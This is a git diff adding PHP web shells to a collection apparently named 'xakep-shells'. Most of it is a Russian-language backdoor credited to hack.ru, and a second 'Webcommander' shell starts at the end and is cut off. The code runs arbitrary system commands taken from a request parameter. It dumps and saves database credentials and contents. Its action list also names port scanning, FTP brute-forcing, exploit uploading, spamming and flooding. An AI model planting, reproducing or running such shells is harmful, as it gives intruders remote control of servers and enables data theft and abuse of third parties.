+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+  
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+// SQL functions start
+function aff_date() {
+ $date_now=date("F j,Y,g:i a");
+ return $date_now;
+} 
+
+function sqldumptable($table) {
+ global $sv_s,$sv_d,$drp_tbl;
+ $tabledump = "";
+ if ($sv_s) {
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; } 
+  $tabledump.="CREATE TABLE $table (\n";
+  $firstfield=1;
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+  while ($champ=mysql_fetch_array($champs)) {
+   if (!$firstfield) { $tabledump.=",\n"; } 
+   else { $firstfield=0;}
+   $tabledump.=" $champ[Field] $champ[Type]";
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";} 
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";} 
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+  }
+  
+  @mysql_free_result($champs);
+  $keys=mysql_query("SHOW KEYS FROM $table");
+  while ($key=mysql_fetch_array($keys)) {
+   $kname=$key['Key_name'];
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+   $index[$kname][]=$key['Column_name'];
+  }
+ 
+  @mysql_free_result($keys);
+  while(list($kname,$columns)=@each($index)) {
+   $tabledump.=",\n";
+   $colnames=implode($columns,",");
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+   else {
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+    $tabledump.=" KEY $kname ($colnames)";
+   }
+  }
+  $tabledump.="\n);\n\n";
+ }
+
+ if ($sv_d) {
+  $rows=mysql_query("SELECT * FROM $table");
+  $numfields=mysql_num_fields($rows);
+  while ($row=mysql_fetch_array($rows)) {
+   $tabledump.="INSERT INTO $table VALUES(";
+   $cptchamp=-1;
+   $firstfield=1;
+   while (++$cptchamp<$numfields) {
+    if (!$firstfield) { $tabledump.=",";} 
+    else { $firstfield=0;}
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";} 
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+   }
+   $tabledump.=");\n";
+  }
+  @mysql_free_result($rows);
+ } 
+
+ return $tabledump;
+} 
+
+function csvdumptable($table) {
+ global $sv_s,$sv_d;
+ $csvdump="## Table:$table \n\n";
+ if ($sv_s) {
+  $firstfield=1;
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+  while ($champ=mysql_fetch_array($champs)) {
+   if (!$firstfield) { $csvdump.=",";} 
+   else { $firstfield=0;}
+   $csvdump.="'".$champ['Field']."'";
+  }
+
+  @mysql_free_result($champs);
+  $csvdump.="\n";
+ }
+
+ if ($sv_d) {
+  $rows=mysql_query("SELECT * FROM $table");
+  $numfields=mysql_num_fields($rows);
+  while ($row=mysql_fetch_array($rows)) {
+   $cptchamp=-1;
+   $firstfield=1;
+   while (++$cptchamp<$numfields) { 
+    if (!$firstfield) { $csvdump.=",";} 
+    else { $firstfield=0;}
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+   }
+   $csvdump.="\n";
+  }
+ }
+
+ @mysql_free_result($rows);
+ return $csvdump;
+} 
+
+function write_file($data) {
+ global $g_fp,$file_type;
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+ else { fwrite ($g_fp,$data); }
+}
+
+function open_file($file_name) {
+ global $g_fp,$file_type,$dbbase,$f_nm;
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); } 
+ else { $g_fp=fopen ($file_name,"w"); } 
+
+ $f_nm[]=$file_name;
+ $data="";
+ $data.="##\n";
+ $data.="## NFM hack.ru creator \n";
+ $data.="##-------------------------\n";
+ $data.="## Date:".aff_date()."\n";
+ $data.="## Base:$dbbase \n";
+ $data.="##-------------------------\n\n";
+ write_file($data);
+ unset($data);
+}
+ 
+function file_pos() {
+ global $g_fp,$file_type;
+ if ($file_type=="1") { return gztell ($g_fp); }
+ else { return ftell ($g_fp); }
+}
+ 
+function close_file() {
+ global $g_fp,$file_type;
+ if ($file_type=="1") { gzclose ($g_fp); }
+ else { fclose ($g_fp); }
+}
+
+function split_sql_file($sql) {
+ $morc=explode(";",$sql);
+ $sql="";
+ $output=array();
+ $matches=array();
+ $morc_cpt=count($morc);
+ for ($i=0;$i < $morc_cpt;$i++) {
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+   else {
+    $temp=$morc[$i].";";
+    $morc[$i]="";
+    $complete_stmt=false;
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+     if (($unescaped_quotes % 2)==1) {
+      $output[]=$temp.$morc[$j];
+      $morc[$j]="";
+      $temp="";
+      $complete_stmt=true;
+      $i=$j;
+     } else {
+      $temp.=$morc[$j].";";
+      $morc[$j]="";
+     }
+    }
+   }
+  }
+ }
+ return $output;
+} 
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+// SQL functions END
+
+// main SQL()
+function sql() {
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+ $secu_config="xtdump_conf.inc.php";
+ $dbhost=$_POST['dbhost'];
+ $dbuser=$_POST['dbuser'];
+ $dbpass=$_POST['dbpass'];
+ $dbbase=$_POST['dbbase'];
+ $tbls =$_POST['tbls'];
+ $sqlaction =$_POST['sqlaction'];
+ $secu =$_POST['secu'];
+ $f_cut =$_POST['f_cut'];
+ $max_sql =$_POST['max_sql'];
+ $opt =$_POST['opt'];
+ $savmode =$_POST['savmode'];
+ $file_type =$_POST['file_type'];
+ $ecraz =$_POST['ecraz'];
+ $f_tbl =$_POST['f_tbl'];
+ $drp_tbl=$_POST['drp_tbl'];
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-íàçàä-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+ // SQL actions STARTS
+
+ if ($sqlaction=='save') {
+  if ($secu==1) {
+   $fp=fopen($secu_config,"w");
+   fputs($fp,"<?php\n");
+   fputs($fp,"\$dbhost='$dbhost';\n");
+   fputs($fp,"\$dbbase='$dbbase';\n");
+   fputs($fp,"\$dbuser='$dbuser';\n");
+   fputs($fp,"\$dbpass='$dbpass';\n");
+   fputs($fp,"?>");
+   fclose($fp);
+  }
+  if (!is_array($tbls)) {
+   echo $header."
+<br><center><font color=red>ÒÛ ÇÀÁÛË âûäåëèòü íóæíûå òåáå òàáëèöû äëÿ äàìïèíãà =)</b></font></center>\n$footer";
+   exit;
+  }
+  if($f_cut==1) {
+   if (!is_numeric($max_sql)) {
+    echo $header."<br><center><font color=red><b>Îøèáêà.</b></font></center>\n$footer";
+    exit;
+   }
+   if ($max_sql < 200000) {
+    echo $header."<br><center><font color=red><b>áàçà sql áîëüøå 200 000 ìá</b></font></center>\n$footer";
+    exit;
+   }
+  } 
+ 
+  $tbl=array();
+  $tbl[]=reset($tbls);
+  if (count($tbls) > 1) {
+   $a=true;
+   while ($a !=false) {
+    $a=next($tbls);
+    if ($a !=false) { $tbl[]=$a; } 
+   }
+  }
+ 
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; } 
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+  else { exit; }
+ 
+  $fext=".".$savmode;
+  $fich=$dbbase.$fc.$fext;
+  $dte="";
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+  if ($file_type=='1') { $gz.=".gz"; }
+  $fcut=false;
+  $ftbl=false;
+  $f_nm=array();
+  if($f_cut==1) { $fcut=true;$max_sql=$max_sql;$nbf=1;$f_size=170;}
+  if($f_tbl==1) { $ftbl=true; }
+  else {
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+  }
+ 
+  $nbf=1;
+  mysql_connect($dbhost,$dbuser,$dbpass);
+  mysql_select_db($dbbase);
+  if ($fext==".sql") {
+   if ($ftbl) { 		
+    while (list($i)=each($tbl)) {
+     $temp=sqldumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut) {
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+      $nbf=0;
+      $p_sql=split_sql_file($temp);
+      while(list($j,$val)=each($p_sql)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val.";"); }
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+      }
+      close_file();
+     }
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   } else {
+    $tblsv="";
+    while (list($i)=each($tbl)) {
+     $temp=sqldumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut && ((file_pos()+$sz_t) > $max_sql)) {
+      $p_sql=split_sql_file($temp);
+      while(list($j,$val)=each($p_sql)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val.";"); }
+       else {
+        close_file();
+        $nbf++;
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+        write_file($val.";");
+       }
+      }
+     } else { write_file($temp); }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   }
+  }
+  else if ($fext==".csv") {
+   if ($ftbl) {
+    while (list($i)=each($tbl)) {
+     $temp=csvdumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut) {
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+      $nbf=0;
+      $p_csv=split_csv_file($temp);
+      while(list($j,$val)=each($p_csv)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val."\n"); }
+       else {
+        close_file();
+        $nbf++;
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+        write_file($val."\n");
+       }
+      }
+      close_file();
+     } else {
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+      write_file($temp."\n\n");
+      close_file();
+      $nbf=1;
+     }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   } else {
+    while (list($i)=each($tbl)) {
+     $temp=csvdumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut && ((file_pos()+$sz_t) > $max_sql)) {
+      $p_csv=split_sql_file($temp);
+      while(list($j,$val)=each($p_csv)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val."\n"); }
+       else {
+        close_file();
+        $nbf++;
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+        write_file($val."\n");
+       }
+      }
+     } else { write_file($temp); }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   }
+  }
+
+  mysql_close();
+  if (!$ftbl) { close_file(); }
+
+  echo $header;
+  echo "<br><center>Âñå äàííûå â ýòèõ òàáëèöàõ:<br> ".$tblsv." ïîìåùåíû â ôàéë óêàçàííûé íèæå:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Ôàéë</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Ðàçìåð</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+  reset($f_nm);
+  while (list($i,$val)=each($f_nm)) {
+   $coul='#99CCCC';
+   if ($i % 2) { $coul='#CFE3E3'; }
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+   $fz_tmp=filesize($val);
+   if ($fcut && ($fz_tmp > $max_sql)) {
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+   } else {
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." áàéò</font>&nbsp;</td><td></td></tr>";
+   }
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+  }
+  echo "</table><br>";
+  echo $footer;exit;
+ }
+
+ if ($sqlaction=='connect') { 
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) { 
+   echo $header."<br><center><font color=red><b>Ïîäêëþ÷åíèå íå âîçìîæíî! Ïðîâåðüòå ïðàâèëüíî ëè ââåäåíû äàííûå!</b></font></center>\n$footer";
+   exit;
+  }
+ 
+  if(!@mysql_select_db($dbbase)) { 
+   echo $header."<br><center><font color=red><<b>Ïîäêëþ÷åíèå íå âîçìîæíî! Ïðîâåðüòå ïðàâåëüíî ëè ââåäèíû äàííûå!</b></font></center>\n$footer";
+   exit;
+  }
+
+  if ($secu==1) {
+   if (!file_exists($secu_config)) {
+    $fp=fopen($secu_config,"w");
+    fputs($fp,"<?php\n");
+    fputs($fp,"\$dbhost='$dbhost';\n");
+    fputs($fp,"\$dbbase='$dbbase';\n");
+    fputs($fp,"\$dbuser='$dbuser';\n");
+    fputs($fp,"\$dbpass='$dbpass';\n");
+    fputs($fp,"?>");
+    fclose($fp);
+   }
+   include($secu_config);
+  } else {
+   if (file_exists($secu_config)) { unlink($secu_config); }
+  }
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+  $tables=mysql_list_tables($dbbase);
+  $nb_tbl=mysql_num_rows($tables);
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Âûáèðèòå íóæíûå âàì òàáëèöû äëÿ äàìïèíãà!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Âûäåëèòü âñ¸' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Íàçâàíèÿ òàáëèö</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  $i=0;
+  while ($i < mysql_num_rows ($tables)) {
+   $coul='#99CCCC';
+   if ($i % 2) { $coul='#CFE3E3';}
+   $tb_nom=mysql_tablename ($tables,$i);
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+   $i++;
+  }
+
+  mysql_close();
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'> 
+  Ñîõðàíèòü â ôîðìàòå csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked> 
+  Ñîõðàíèòü â ôîðìàòå Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+  Ñîõðàíèòü ñòðóêòóðó è äàííûå<br> <input type='radio' name='opt' value='2'>
+  Ñîõðàíèòü òîëüêî ñòðóêòóðó<br> <input type='radio' name='opt' value='3'>
+  Ñîõðàíèòü òîëüêî äàííûå<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+  Ïåðåçàïèñûâàòü ôàéë, åñëè ñóùåñòâóåò<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+  Î÷èñòèòü áàçó ïîñëå ñîçäàíèÿ äàìïà<br> <input type='Checkbox' name='f_tbl' value='1'> 
+  Ïîìåùàòü êàæäóþ òàáëèöó â îòäåëüíûé ôàéë<br> <input type='Checkbox' name='f_cut' value='1'>
+  Ìàêñèìàëüíûé ðàçìåð îäíîãî äàìï-ôàéëà: <input type='text' name='max_sql' value='200000' class=form>
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+  Gzip.<br> 
+  </td></tr></table><br><br><input type='submit' value=' Çàäàìïèòü:) ' class=form></form></center>$footer";
+  exit;
+ }
+
+// SQL actions END
+
+ if(file_exists($secu_config)) {
+  include ($secu_config);
+  $ck="checked";
+ } else {
+  $dbhost="localhost";
+  $dbbase="";
+  $dbuser="root";
+  $dbpass="";
+  $ck="";
+ }
+ 
+ echo $header."
+<table width=620 cellpadding=0 cellspacing=0 align=center> 
+ <col width=1> 
+ <col width=600> 
+ <col width=1> 
+ <tr>
+  <td></td>
+  <td align=left class=texte>
+   <br>
+   <form action='' method='post'>
+   <input type='hidden' name='sqlaction' value='connect'> 
+   <table border=0 align=center> 
+    <col> 
+    <col align=left> 
+    <tr>
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!<br><br></td> 
+    </tr> 
+    <tr>
+     <td class=texte>Àäðåñ ñåðâåðà:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+    </tr> 
+    <tr>
+     <td class=texte>Íàçâàíèå áàçû:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td> 
+    </tr> 
+    <tr>
+     <td class=texte>Ëîãèí:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td> 
+    </tr> 
+    <tr>
+     <td class=texte>Ïàðîëü</td> 
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td> 
+    </tr> 
+   </table> 
+   <br> <center> <br><br> 
+   <input type='submit' value=' Ïîäêëþ÷èòñÿ ' class=form></center> </form> <br><br> 
+  </td> 
+  <td></td> 
+ </tr> 
+ <tr> 
+  <td height=1 colspan=3></td> 
+ </tr> 
+</table>
+</center>";
+
+}
+// SQL END
+
+/* main() */
+set_time_limit(0);
+
+if ( $action !="download") print("$HTML");
+
+if (!isset($cm)) {
+ if (!isset($action)) {
+  if (!isset($tm)) { $tm = getcwd(); }
+  $curdir = getcwd();
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Íåò äîñòóïà ê äåðèêòîðèè, ñìîòðè CHMOD.</td></tr></table>");
+  getdir();
+  chdir($curdir);
+  $supsub = $gdir[$j-1];
+  if (!isset($tm) ) { $tm=getcwd();}
+  readdirdata($tm);
+ } else {
+  switch ($action) {
+   case "view":
+    viewfile($tm,$fi);
+    break;
+   case "delete":
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>$fi</b> óñïåøíî óäàëåí.</font></center></td></tr></table>";
+    deletef($tm);
+    break;
+   case "download":
+   if (isset($fatt) && strlen($fatt)>0) {
+    $attach=$fatt; 
+    header("Content-type: text/plain"); 
+   } 
+   else {
+    $attach=$fi;
+    header("Content-type: hackru"); 
+   }
+   header("Content-disposition: attachment; filename=\"$attach\";"); 
+   readfile($tm."/".$fi);
+   break;
+   case "download_mail":
+   download_mail($tm,$fi);
+   break;
+   case "edit":
+   editfile($tm,$fi);
+   break;
+  case "save":
+   savefile($tm,$fi);
+   break;
+  case "uploadd":
+   uploadtem();
+   break;
+  case "up":
+   up($tm);
+   break;
+  case "newdir":
+   newdir($tm);
+   break;
+  case "createdir":
+   cdir($tm);
+   break;
+  case "deldir":
+   deldir();
+   break;
+  case "feedback":
+   mailsystem();
+   break;
+  case "upload":
+   upload();
+   break;
+  case "help":
+   help();
+   break;
+  case "ftp":
+   ftp();
+   break;
+  case "portscan":
+   portscan();
+   break;
+  case "sql":
+   sql();
+   break; 
+  case "tar":
+   tar();
+   break; 
+  case "bash":
+   bash();
+   break; 
+  case "passwd":
+   passwd();
+   break; 
+  case "exploits":
+   exploits($dir);
+   break;
+  case "upload_exploits":
+   upload_exploits($dir);
+   break; 
+  case "upload_exploitsp":
+   upload_exploitsp($dir);
+   break; 
+  case "arhiv":
+   arhiv($tm,$pass);
+   break; 
+  case "crypte":
+   crypte();
+   break;
+  case "decrypte":
+   decrypte();
+   break;  
+  case "brut_ftp":
+   brut_ftp();
+   break; 
+  case "copyfile":
+   copyfile($tm,$fi);
+   break; 
+  case "down":
+   down($dir);
+   break;
+  case "downfiles":
+   downfiles($dir);
+   break; 
+  case "spam":
+   spam();
+   break; 
+   case "flud":
+   flud();
+   break; 
+  case "spam1":
+   spam1($file);
+   break; 
+  case "del":
+   del();
+   break; 
+  }
+ }
+} else {
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Âûïîëåíî: $cm</center><pre>";
+ echo system($cm);
+ echo "</pre></td></tr></table>";
+}
+
+if ($action !="download" && $action != "flud" && $action != "down" && $action != "del" && $action != "spam1" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Êîìàíäíàÿ ñòðîêà:</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td></tr></form></table>";
+ $perdir = @permissions(fileperms($tm));
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íå ìîãó çàãðóæàòü ôàéëû â ýòîé äåðèêòîðèè</b></font></td></tr></table>";
+ if ($perdir[7] == "w" && isset($tm)) {
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Ñîçäàòü êàòàëîã:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td></tr></form></table>";
+ } else {
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íå ìîãó ñîçäàòü ïàïêó â ýòîé äåðèêòîðèè</b></td></tr></table>";
+ }
+}
+
+if ($action !="download" && $action != "flud" && $action != "down" && $action != "del" && $action != "spam" && $action != "spam1" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ãîòîâûå çàïðîñû ê Unix ñåðâåðó:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='Äàâè' class=button1 $style_button></td></tr></table></form>";
+}
+
+if ( $action !="download") echo nfm_copyright();
+?>
diff --git a/xakep-shells/PHP/ngh.php.php.txt b/xakep-shells/PHP/ngh.php.php.txt
new file mode 100644
index 0000000..b5e334a
--- /dev/null
+++ b/xakep-shells/PHP/ngh.php.php.txt
@@ -0,0 +1,462 @@
+<?
+/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */
+
+$script = $_SERVER["SCRIPT_NAME"];
+
+/* username and pass here ***************/
+
+$user = "yourlogin";
+$pass = "yourpass";
+
+/****************************************/
+
+$login = @$_POST['login'];
+$luser = @$_POST['user'];
+$lpass = @$_POST['pass'];
+$act = @$_GET['act'];
+
+   $logo = "R0lGODlhMAAwAOYAAAAAAP////r6+jEvKzQ0NQICATc3HiAgGyoqJxsbGQ4ODXl5dPr68m1taoWFgj4+Pf39+vr6+Obm5Pj49/Ly"
+          ."8ezs693d3MXFxJaWlV5dRtDOnquphqumcCcmGrezf8G9icnFlKCdet/br9jUqePgt+fkvOTj1X94PJKLUby7sk9JHF9ZKnJrPDk4"
+          ."MEdAFD08NqqnmBUUEGxoVtnTukdFPV1cWGZlYezjxPXv2JCNgoN8ZuDcz3VvX/Dnz9vWx8fDt/jz5ZmWjrOwp/bz67mxnOrgyLu1"
+          ."p9PNwfLt41BPTamoprGYabqrkK6gh+vcwu7izOLKpObSsujVtY6Cb+nXuerZveHFnbymheTNqubQrvf18ruedvDm2LW0s9DPz/v7"
+          ."+7m5uQUFBQICAv///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+          ."AAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAGMALAAAAAAwADAAAAf/gGOCg4SFhoeIiYqLjI2OhFORUzqUOjyXlzKaMjU1SQ0L"
+          ."j4tTXWCmp6inXV1KGA6doaKIU2ACtre4uBUSXmAODhhJsoe0uca4FLxKCxcYL8OFOrXH1BQWXjYSFw4E0IPF1NQVFUkC2tzeY9K2"
+          ."BQhJDzEAAOEU5ebb3dDSCghdFBS7MDSQZ2tCriQVbJ17NkxHghwBLIDxYsFCBQtKbCAQYBBXEosCvmgLNgwAhi9dFjQgQOABKC9K"
+          ."BhpLQjGhyGY2RHVBoK1Bgi5fbHUB4KBZv4MJEiB4kKQGKFCPDkx0ICZoLgBdXM3DpQ2MkiAOFtio8SCnozBeLgDoaCyGr623/ybw"
+          ."AtMFRo6wSWg8ClMBDFxjBLxg+MtxwrULrILksNHikRgKSgjjomFhsDEtF70cSQEjyIIBjjFKvvVAgmVcE7RY23HkhxEYnx8hEB0O"
+          ."wYTTBbVoQSJhh2bXU0A3WjEAYwEXyJMnt70AQIHcWoYgQWKC9Y8UOYQrWrHihALEBFaoGJ98PIHKCjrESB1dOnUfPlpnX9T9xAkW"
+          ."MRSsYMG/f/8VBhzAnQoxtCcdF1zs4MMMM8y3HQonoMABBx+MMEIRSAQQABJFiDDCBx4sAeEKCLQ3HRIJ7sBgCI09iIIHI4ggYwk9"
+          ."1GhCCSSMAMIHH3CAgg4svDDEEECciGARDDbRYv8iK6CwxAdMpNBDCSWMEMIGGmgAAggbyJBBBiiEoEMGJqTwg3s7CGGEEzMouYgN"
